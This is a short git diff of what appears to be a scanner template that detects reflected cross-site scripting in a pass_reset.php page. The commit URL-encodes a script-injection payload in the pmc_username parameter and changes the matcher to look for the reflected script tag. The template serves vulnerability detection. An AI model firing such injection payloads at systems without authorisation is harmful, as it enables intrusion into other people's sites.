updating temp
parent
895dde3b2d
commit
4d5bdb15e4
|
@ -8,12 +8,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username="><script>alert(1337)</script>"
|
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "1337"
|
- "<script>alert(1337)</script>"
|
||||||
part: body
|
part: body
|
||||||
|
|
Loading…
Reference in New Issue